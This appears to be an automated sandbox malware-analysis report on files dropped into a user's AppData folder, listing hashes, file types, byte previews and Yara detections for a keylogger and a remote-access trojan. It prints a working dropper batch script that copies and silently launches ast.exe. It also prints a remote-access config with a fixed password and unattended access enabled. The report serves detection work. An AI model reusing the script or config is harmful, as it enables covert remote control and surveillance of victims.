                                                                                                                          C:\Users\user\AppData\Roaming\fat\AstCrp.dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):172216
                                                                                                                          Entropy (8bit):6.698242571688099
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:nGhQI/PxvCWRDvcDfo0F5HekeyO54ECV0/sMHL0WPCCb5rAg0Fujx8E0/3xt9qKv:kPxqWYF5HkyDLMsOzrAOL23VqK28j
                                                                                                                          MD5:CF1169A87FE6266C7B457A2424DA69DA
                                                                                                                          SHA1:5ADD67DEFD4CA56C1E9C0B239899EA699B140B64
                                                                                                                          SHA-256:24E01FD95225E260CDD41015A70374A048568D4DF6681B3D44EAABCB1EA03EAF
                                                                                                                          SHA-512:7BF76EB5B4E31A65931AF730909FBF848334BC98DA279E291E186FCAFDC81C76D1EF0EFEC4E00B8EAEDE6F8D130DA8B6B3D3C5DD8C14C6DCD3BCDC7D050A4B66
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.%.).K.).K.).K.r.H.$.K.r.N...K.r.O.?.K...J.-.K.{.H.=.K.{.N...K.{.O...K.r.J...K.).J...K...B.!.K...K.(.K.....(.K.)..(.K...I.(.K.Rich).K.................PE..L.....@a...........!.....t...........V..............................................B.....@.........................`X..h....X..P.......(............|...$...........H..8............................H..@...............8............................text....s.......t.................. ..`.rdata...............x..............@..@.data........p.......P..............@....rsrc...(............\..............@..@.reloc...............b..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Roaming\fat\ast.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7543992
                                                                                                                          Entropy (8bit):6.717610928993395
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:98304:q0f/bCIDcCkgVmZqIXrdoXj++CEKDFBaVOGizeKFUtqiAp+hRWmMLlJ7p1:X/bCIPkgVpycKDFqOLNUtqiAz
                                                                                                                          MD5:8002D9E5851728EB024B398CF19DE390
                                                                                                                          SHA1:9A1DC7134F3F6FCCB37DFC4DDDA35DFA2875095E
                                                                                                                          SHA-256:B8DDE42C70D8C4A3511D5EDFFBC9F7F0C03DBDA980E29693E71344F76DA6BB0F
                                                                                                                          SHA-512:6936B6B01F9FC2F2F69DE6AE468A9F7173239BD003AD8B7BC7336C4DD4DB50457E20EC6783B2E8A166D684A56F3F1E9FB701CA903DF3F74E3CA25C46B8A8D00E
                                                                                                                          Malicious:true
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\fat\ast.exe, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\fat\ast.exe, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_TVrat, Description: Yara detected TVrat, Source: C:\Users\user\AppData\Roaming\fat\ast.exe, Author: Joe Security
                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....@a..................K..`'.......K.......K...@...........................y.......s..........@............................S..m....X..f ...........r..$... T.8d............T...............T.....................@.S..............................text... .J.......J................. ..`.itext..$.....J.......J............. ..`.data...T"....K..$....K.............@....bss..........M.......M..................idata...m....S..n....M.............@....tls....D.....T......*N..................rdata..#.....T......*N.............@..@.reloc..8d... T..f...,N.............@..B.rsrc....f ...X..f ...R.............@..@..............y.......r.............@..@................................................................................................

                                                                                                                          C:\Users\user\AppData\Roaming\fat\astclient.dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):581304
                                                                                                                          Entropy (8bit):6.580382227041057
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:bj4Q3+oAscridrDg76u3HsBTc9GtIGPi2Emvh5/kJSMl0yomcY/nRwl2Sp:bHYXSTMGtNPitm1yomJ/n+tp
                                                                                                                          MD5:CDC5A8221738C1CA66564755BB58138C
                                                                                                                          SHA1:EF096A2CAF133D217C202C147855F2CEE7ECD105
                                                                                                                          SHA-256:DF5CEF85E92C6FFFAAC0ACDCE645AED3C5FA1F8FE7F9700D84CA08468AD3D5E3
                                                                                                                          SHA-512:A9F3E256518771C1C97374E7AE3EE19EBEC0D794CD740E059DBC8289356CF1FB5D4A19F2677DB2ADBB179A73520AAEC67947DCF4C8BCD930206DE4B6CDCAD4C6
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9...}..O}..O}..O.|*Ol..O.|(O...O.|)Oc..O/..Nd..O/..N...O/..N_..O...Ol..O}..O...O..Nh..O..N|..O.$O|..O}.LO|..O..N|..ORich}..O........PE..L...L..a...........!..... ...........m.......0......................................C.....@.........................0...P...............0................$.......[......p..............................@............0...............................text............ .................. ..`.rdata..H....0.......$..............@..@.data....d... ...D..................@....rsrc...0............X..............@..@.reloc...[.......\...^..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Roaming\fat\astrct.dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1724088
                                                                                                                          Entropy (8bit):6.573221633911959
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:uSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSvSSSSSSSSSSSSSSSlwwwwwwwwwwwwwwI:uSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSO
                                                                                                                          MD5:E0E559010A1CC7CB6B6F754E8833A156
                                                                                                                          SHA1:0ADB286A1511B9D5820B042EE7D059DAEE8D0978
                                                                                                                          SHA-256:A49D90D39BCF0FB183A8E2DFDA90E1B745565DDC25C0CC92ED7068868CB8F3E4
                                                                                                                          SHA-512:3225A22CA8044FAFE03C005C55924B71EC2D3C9EE2325B45703EADC1F912DD867DD7FADCA0652FA2ACD46D4067575377388134E3CC58B13C0F82540224E98221
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......3...w...w...w....5k.o....5i.....5h.h.......Y...w...:...........%...l...%.......%...R....VQ.d...w................v.....e.v...w...v.......v...Richw...........PE..L..._..`...........!.....@...B...............P......................................Q.....@.........................@Z..H....Z..........(............*...$... ..........p...........................P...@............P..|............................text....>.......@.................. ..`.rdata..(....P... ...D..............@..@.data........p...2...d..............@....rodata.@...........................@..@.rsrc...(...........................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Roaming\fat\aw_sas32.dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):17648
                                                                                                                          Entropy (8bit):6.317642988990049
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:ZPkFNiOMTd1th9gQIim+4vBDVU376TFNiWC:iNhMpXgIr4vBBYANi1
                                                                                                                          MD5:ACF7048E2347CFD66CD17648DBFBAF45
                                                                                                                          SHA1:DF5A12E399176771DC8CF2F7D0CF5548E41E2BB3
                                                                                                                          SHA-256:F1CFFBC2ADA8491755C76360AAD14314DEB576AA65F503E52FA24DEE7D33D8E7
                                                                                                                          SHA-512:51A53CB700FBB7ABF3BDA3101ED0885572460C1686D07C3D2125C8AA6F0834E30528BEE78CC40EE9270714A16AC769D16F5A916F37F0E48BBF7121202E58E0C0
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......):5.m[[.m[[.m[[.d#..o[[.d#..c[[.d#..o[[.d#..j[[.m[Z.S[[.d#..k[[.d#..l[[.d#..l[[.Richm[[.........PE..L......K...........!.........................0...............................p............@..........................<..N...|6..P....P...............0.......`..$....................................4..@............0...............................text...;........................... ..`.rdata.......0......................@..@.data........@.......&..............@....rsrc........P.......(..............@..@.reloc.......`.......,..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Roaming\fat\config.ini

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):586
                                                                                                                          Entropy (8bit):5.193353768565217
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:LzSeQNlTQ/dw/7y/x5/D++472p+fso+9hffAaJYQMhsK/qI8qP:HSeWlcMypJD5KxkiaJosBq
                                                                                                                          MD5:CAA0C19D802D86B5A6B290897AA864EE
                                                                                                                          SHA1:01C139425983B9EC2A8FE42C9D685D1193D5A8BB
                                                                                                                          SHA-256:EDEECC1090C314D7397B171CD09E1C208FCCE3B580794BAC425475E4292629FA
                                                                                                                          SHA-512:95B595038F720A45449E77E121B0AF3FFA251034EFD6F187C8572C54F667D11F467AF6A5F062F50B60C8001645CA33B5F204482753AF72BDD2AA3A3834BD2C35
                                                                                                                          Malicious:false
                                                                                                                          Preview:[config]..Security.FixPass=96E79218965EB72C92A549DD5A330112..Main.Autorun=1..Main.CloseButtonOperation=0..Main.CheckUpdates=0..Security.UseLocalSecuritySettings=1..Security.DynPassKind=0..Security.PassLifetime=0..Security.CanWinAuth=1..Security.AccessKind=1..Security.CanWinLoginAnotherUser=1..Security.UNCONTROLLED_ACCESS=1..Security.CanWinLoginNotAdmin=1..Security.DenyRemoteSettingsControl=0..Security.DenyLockControls=0..Log.ServerStoreTechLog=0..Main.AWAYMODE_REQUIRED=1..Main.LogsLifetime=1..Main.LogsForMail2Support=1..ProxySettings.UseKind=1..ProxySettings.StoreUserAndPassw=1..

                                                                                                                          C:\Users\user\AppData\Roaming\fat\fguwrtug.bmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x225, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):10752
                                                                                                                          Entropy (8bit):7.9500738973365355
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:Nr2Ya94sQ6EqghLbOU+fWt1t7ZPA+KAMcB6Bk0Nmd32iF2la8XncszJfBzG1:p2Ya94s8q8+fQttI+8cABGJ4la8vVfp6
                                                                                                                          MD5:15955D8B74435C9CA1A6E273644CE86B
                                                                                                                          SHA1:E43F73B27A7F76014706296339F4CE1C71C86EFE
                                                                                                                          SHA-256:796097E407FE8EB02A965CD5416DDAE0C1F178C153A71FCF8590F4BED4F5A389
                                                                                                                          SHA-512:38593F7523D416A4E0BC855F52BA76B1ABE1F65E912ED5E892DE4C210B0055B07472DA5B8C0CB731BC1E4B26C43FF2A346CE84B893907AB121EB74D6555296C8
                                                                                                                          Malicious:false
                                                                                                                          Preview:......JFIF.................................................. ,$..) ..&6&).2333."9>;1=,230...........2)$)52222222222822222222222222222222222222222222222222...........".......................................F......................!.1..AQ."aq.2.Bb...#R....3r....C....$s.45DSt.................................(........................!1A"Q.a2q.................?..N....+..@S.W...@....+..../..8..5.=..}.kAD....>q....E..n.r./.Q..v......5..v.l....f?.s.....m.R.Z.......D..u...-....K..U...S.Xt ......^'... ...[gv....Xjm.*p$.~..n.LY.%.,@..x....|(...Z.X.Uk.1..=...u....U.1.L...@..-r......e...G.Vo.......Vb..P.y.A.....&v5..p..U#Sy.........X..+&-........../.k.A..0$..Jt..t.&.V.\u.q.+....."J..GH..o[.......Tjq"G..o..e.:H.h...:..Ah..=.H..J...V....Y...2.........{.;U.......`...Y..@..'`3....(.s.k..c...eY...03.'.T.V..e@..h \(..vI]...F....Fu.....'...g-.....-..;6L.i.N...W.-.f...WQ..@..ub;.=.[.r..|k......bL...i.o&..9..m..`....3...a...R.7%.=z..N.s.n.R..b;k......h.5M...h..Ay..........q

                                                                                                                          C:\Users\user\AppData\Roaming\fat\g3ll5lm.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):395
                                                                                                                          Entropy (8bit):4.596567576097278
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:hmR9ooW9rw49edspB7utcA2dcvNiccA2dx0HcA2d7DvDTfcA2djLvWVOzwaowQ4:w7Q249edaBS7jfxmfJ8WsQwH
                                                                                                                          MD5:21138C5F0FC42E27B57CBADC4CFCB7B7
                                                                                                                          SHA1:EBC7FB05FD67B43925EC4EE2A43A2F3152712B28
                                                                                                                          SHA-256:C8D896D8DAE872D0FF7ED407E9706E19F798FBADBA7AF7EF48E5EDDA4BF05C23
                                                                                                                          SHA-512:20D832E675D2AAB97DF7FC10BAD055F96327F782224C0A1C0F10C4D7CF01CCC7428AB934DA889935C2E67D6FAC959C1F52D796314988168844C5F079B55D67F1
                                                                                                                          Malicious:false
                                                                                                                          Preview:@echo off..set "StartDirName=fat" ..set "TempDirName=qilq" ..set "BatchName=g3ll5lm.bat" ..set "ProcName=ast.exe" ......mkdir "%appdata%\%StartDirName%"..xcopy /Y /I /S "%~dp0*" "%appdata%\%StartDirName%\"..del /f /q "%appdata%\%StartDirName%\%BatchName%"..start "" "%appdata%\%StartDirName%\%ProcName%"..for /d %%i in (%temp%\%TempDirName%) do rd /s /q %%i..

                                                                                                                          C:\Users\user\AppData\Roaming\fat\hatls.dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2236144
                                                                                                                          Entropy (8bit):5.624149670958732
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:2HGHuX4EewGQcPryfFMoxJ+4PulW/ChEIgTS/zRUm:2HGOX4CGQtMs+WuVge/em
                                                                                                                          MD5:BCCF6A5C2595EEA84533692BB788D8BB
                                                                                                                          SHA1:24318226F145E52B7633A4E9E844D6EAD43B75AC
                                                                                                                          SHA-256:ABF75DE674428E112F90F1C618218FF73EF851F4F09C5F5BA8B69E79A6C74DBF
                                                                                                                          SHA-512:78F24F0812AAE31E83340ADEB1A1AE8C00EDFDF483E299706F863CB713BFDC2501B5418CE8F8BD9131E3C704BFFB58A8CA05C5E0A75EB19F15E0409C5B74E35B
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............}...}...}.K....}.K..._.}.K.....}...~..}...y..}.......}...|.W.}...x...}...x...}...}...}......}.......}.......}.Rich..}.................PE..L..."..[...........!.........x.......................................................,"...@.........................P.,.^....s-.P.....-.0.............".......-.....`.+.8...................@.+.......+.@............p-..............................textbss.T...............................text.......p...................... ..`.rdata....... '.....................@..@.data....`....-..@.... .............@....idata.......p-....... .............@..@.msvcjmc......-....... .............@....tls..........-....... .............@....00cfg........-....... .............@..@.rsrc...0.....-....... .............@..@.reloc........-....... .............@..B................................................................................

                                                                                                                          C:\Users\user\AppData\Roaming\fat\libcrypto-1_1.dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2533560
                                                                                                                          Entropy (8bit):6.236092740507617
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:y+PXMbxU8+hh5Mitv70n8yT1CPwDv3uFfJEkyD9:y+PwEMit0n8A1CPwDv3uFfJC
                                                                                                                          MD5:59A3B581020759D52538425A1F5A53D5
                                                                                                                          SHA1:4E7C528EFEF2C42119C80EFE0AA994B7AA6D2AB6
                                                                                                                          SHA-256:4C94F00150231420A0526E9949AC9F339EB04B16BC18CB8A11C7FD98DB1235D6
                                                                                                                          SHA-512:9D30D8167E787FD4A82444BAAA3703920EC41CBE9C684010B63564DE04E00D590C8081006C68627B8297D2715194D4B80C23B959E554D42B2770664D1ED1B79E
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[J...+...+...+...S#..+..MC...+..MC...+..MC...+..MC...+..DC...+...+...+...+...+...B..j)...B...+...BO..+...B...+..Rich.+..........PE..L.....7a...........!.....T...p......;H.......p................................'.......&...@...........................#..h....%.T.....&.|.............&..$....&.L...0.".8...........................h.".@.............%..............................text...>S.......T.................. ..`.rdata.......p.......X..............@..@.data....Y...p%......X%.............@....idata..J.....%......n%.............@..@.00cfg........%.......%.............@..@.rsrc...|.....&.......%.............@..@.reloc........&.......%.............@..B........................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Roaming\fat\libcryptoMD.dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2098416
                                                                                                                          Entropy (8bit):6.277915381502377
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:Vkv4EyvQ/qpyr0kAYdQqqW6qvHewDe01CPwDv3uFR0b5YrpsJ:VkvXyvQ/qpyr0kAd66oewv1CPwDv3uFI
                                                                                                                          MD5:1AFC9BD5E625E85B696141F62FBA4325
                                                                                                                          SHA1:56FB325125F436D7408808446D58AF50F8AA3BFC
                                                                                                                          SHA-256:83A1E3CBE242B978B9F55273B7B2648D0492B741FF561C0EC1C6AD9A4AEDAB47
                                                                                                                          SHA-512:02C2CF9DBC319C2AAF324175CFD3E435824439F33B4CA697324F1B8FF4331D7BDE80DE46909FC629193EF02DEB40853E295B35DC2E3B094D116B5DD783919213
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........+...x...x...x...x...x..,x...x...x...x...x...x(.8x...x...xT..x...x...x@s.x...x@s/x...x..(x...x@s-x...xRich...x................PE..L....<.Y...........!.....j...................................................` ....... ...@.............................1...c..x.................................. ...8............................w..@............`...............................text....i.......j.................. ..`.rdata..XA.......B...n..............@..@.data............Z..................@....idata..M....`......................@..@.rsrc...............................@..@.reloc..z............&..............@..B................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Roaming\fat\libcurl.dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):546816
                                                                                                                          Entropy (8bit):6.657309146326691
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:DEnhioDz6zv6pmEmE5A8K8ZOO2rKQrbdCPAEI:Dmbz+vomEBHbZO2YCBI
                                                                                                                          MD5:13CD45DF8AAA584EBD2A40EDE76F1E06
                                                                                                                          SHA1:BAA19E6A965621CB315E5F866EDC179EF1D6B863
                                                                                                                          SHA-256:3FF4E80E327F298A11E116A517BE0963A0B3CD376A6A624CAFFACD586E6B1449
                                                                                                                          SHA-512:285D7265AC05CECDD43650E5DEF9198B5F2F4D63665739BAA059598E41F4CE892248D3CA7E793AC274DC05B4C19CFA11C17FAEA62FC1E3495C94A03851049328
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........z%...K..K..K..sH..K..sN...K..sO..K.4....K..sN..K..sO..K..sH..K..sJ..K..J.k.K..rO.>.K..rK..K..r...K.....K..rI..K.Rich..K.................PE..L......_...........!......................................................................@.............................0...0...x....@.......................P...H......................................@............................................text...D........................... ..`.rdata..ZQ.......R..................@..@.data...x+..........................@....rsrc........@......................@..@.reloc...H...P...J..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Roaming\fat\libeay32.dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1388688
                                                                                                                          Entropy (8bit):6.85745413435775
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:vNaU+KpPikndiNfzN4jH3PlMQzMjYpOtJqTp/kqg1+:xlUfzN4jH3PlyjYpOLqd/kP1+
                                                                                                                          MD5:3B838DC25E96877A1852966F75A5C44A
                                                                                                                          SHA1:555E1830829B008D66FF591D87AC235F6286AB9A
                                                                                                                          SHA-256:292C9367E5F978D2085192B85BCFEA7DF3A033172703BCCF1FF28A74D65D5AC1
                                                                                                                          SHA-512:B5A7F05CD721FC75B77BB33528F746E865C2277A32F3AA312A974DE903A817B7C83E7698980A496B5D04595B21926E94CF9F70A15CD0882D57BA25014BA775D6
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......lU.*(4.y(4.y(4.y!L<y.4.y!L-y34.y(4.y.4.y...y#4.y(4.y=4.y!L;y.6.y!L*y)4.y!L,y)4.y!L)y)4.yRich(4.y................PE..L...#..]...........!.................................................................:...............................A.......6..x.......0...........................p...................................@...............(............................text............................... ..`.rdata..XY.......Z..................@..@.data............t..................@....rsrc...0............Z..............@..@.reloc..,............`..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Roaming\fat\libjpeg-turbo-win.dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):713456
                                                                                                                          Entropy (8bit):6.620067101616198
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:RPCS0cSUktNimb/JZqNFcbJ3bZJNlvI8CjBMUC6eVc4/SK:RPCS0c1ktNimbqYZJNlvVc4L
                                                                                                                          MD5:96D413CAAF8C7793A96EF200F6695922
                                                                                                                          SHA1:ABFB19A5BEA8724A08A3C709B68C65178E8EFBE5
                                                                                                                          SHA-256:5C6E5346C4EF80E1DD211BD5519311ACA01025CE1D3811113A03E657938F370D
                                                                                                                          SHA-512:93BF7AC89AE64948C3E91294DE89478B0F92D9CEFB71C803ABB324E181D783801C87DD6D806B0DB0D3737B3330E37993AE07B9B7D5AACCA9F9F5C3556E23EEE4
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./..k...k...k....%B.b....%@....%A.r...P..z...P..}...P..d...Fx.h...k...=...k...J......Y......j.....L.j...k.$.j......j...Richk...........PE..L...Q.xX...........!.........$.......P....................................... ............@.........................0....... ...(.......@........................8..0p..p............................p..@...............\............................text...9........................... ..`.rdata..............................@..@.data...(...........................@....gfids..d...........................@..@.rsrc...@...........................@..@.reloc...8.......:..................@..B................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Roaming\fat\libssl-1_1.dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):541880
                                                                                                                          Entropy (8bit):5.766958615909
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:ghUZvMdmP9OwMJvP2jkIgEIdwKADpiw7FCPU2lvzTNl:BhMsPG2udwLdigFyU2lvzTNl
                                                                                                                          MD5:753B75570811052953F336261E3031BB
                                                                                                                          SHA1:2244CCE49368180C1CF6BCA0C57DAEC71401C4F7
                                                                                                                          SHA-256:603C5FD4E29C14DF02937DF765BF76E067A7A4706130D93F947106D0AE09A9DE
                                                                                                                          SHA-512:6C81B813A79077E7157CF7F647A1F3C31A71098037C7003BC40B70E4AADAFCF490FDC01C71A26F8FED8C97BA33B41DF5B8A0D479DA951459CBD56421705813C5
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............K...K...K..wK...K..J...K..J...K..J...K..J...K..J...K)..J...K...Km..K)..J...K)..J...K)..K...K)..J...KRich...K................PE..L.....7a...........!.........................................................p............@..........................)...N........... ..s............ ...$...0...5......8...........................H...@............................................text............................... ..`.rdata...g.......h..................@..@.data....;.......6...`..............@....idata..=A.......B..................@..@.00cfg..............................@..@.rsrc...s.... ......................@..@.reloc..`=...0...>..................@..B................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Roaming\fat\msvcr120.dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):970912
                                                                                                                          Entropy (8bit):6.9649735952029515
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:LBmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJQV:dmFyjLF847eiWWcoGZVOIxh/WxIAIbGV
                                                                                                                          MD5:034CCADC1C073E4216E9466B720F9849
                                                                                                                          SHA1:F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1
                                                                                                                          SHA-256:86E39B5995AF0E042FCDAA85FE2AEFD7C9DDC7AD65E6327BD5E7058BC3AB615F
                                                                                                                          SHA-512:5F11EF92D936669EE834A5CEF5C7D0E7703BF05D03DC4F09B9DCFE048D7D5ADFAAB6A9C7F42E8080A5E9AAD44A35F39F3940D5CCA20623D9CAFE373C635570F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S9...XlA.XlA.XlA..A.XlA.XmA.XlAQ..A.ZlAQ..AvXlAQ..A!XlAQ..A.XlAQ..A.XlAQ..A.XlAQ..A.XlARich.XlA........PE..L....|OR.........."!................D............................................... .....@.........................`........R..(....p...................>......d]..@...8...........................H...@............P...............................text............................... ..`.data...4e.......V..................@....idata.......P......................@....rsrc........p.......0..............@..@.reloc..d].......^...4..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Roaming\fat\opus.dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):370488
                                                                                                                          Entropy (8bit):6.86993159214619
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:wJ9LiOhPhz85popbbFb06wAQAwq961b/v9MkvCq2/JO+UxK6DvX0C7Uxm//f0Ps7:IBi8q5po9JkyICq2/z6DvsyEE5+PgAEX
                                                                                                                          MD5:82E49683F540F78B2D1759CDE594482F
                                                                                                                          SHA1:352DCBDBBB3C5C927B83389E2AB7F40B66EE716A
                                                                                                                          SHA-256:55D99ECD7F821A4B2FE7E5A0B2CEA213DC79004C1DC413BD003F032C61080576
                                                                                                                          SHA-512:F50A3BCD5905103EEC344D7DAF1C17896DF9039D3E8D5E9BBD771F1E235EC6045D626ED838C9BF3A8F7A66AA5F41F0743EA7D9BDEF7492DA8B36561089E126BF
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k-...~...~...~.......~....l..~.......~.......~.......~.......~.......~...~...~]...k..~]......~]..~...~]......~Rich...~........PE..L....g._.........."!.................U....... ...................................... .....@..........................^......\h..(.......................8.......l....W...............................W..@............ ...............................text............................... ..`.rdata..6N... ...P..................@..@.data...8....p.......^..............@....rsrc................h..............@..@.reloc..l............j..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Roaming\fat\quartz.dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1074302464
                                                                                                                          Entropy (8bit):0.007609102467218604
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:1E2570A7DD0C8452B18340E4386C1FA3
                                                                                                                          SHA1:FE1D6D0D86171E8F9AE64A909C4ADCCA13267B20
                                                                                                                          SHA-256:DACBF6D62555C6A75AEEBF978388AB320D3F2B283240C936B82ABD9318ADD699
                                                                                                                          SHA-512:02951D9CD5E88D91A10524D811D5673A2A98DB5EB21E97A1273900625A932DD933B82B60B09C5FE28381890471A7B40388CA3ACD84D5FE42BF9A4B4693727F72
                                                                                                                          Malicious:true
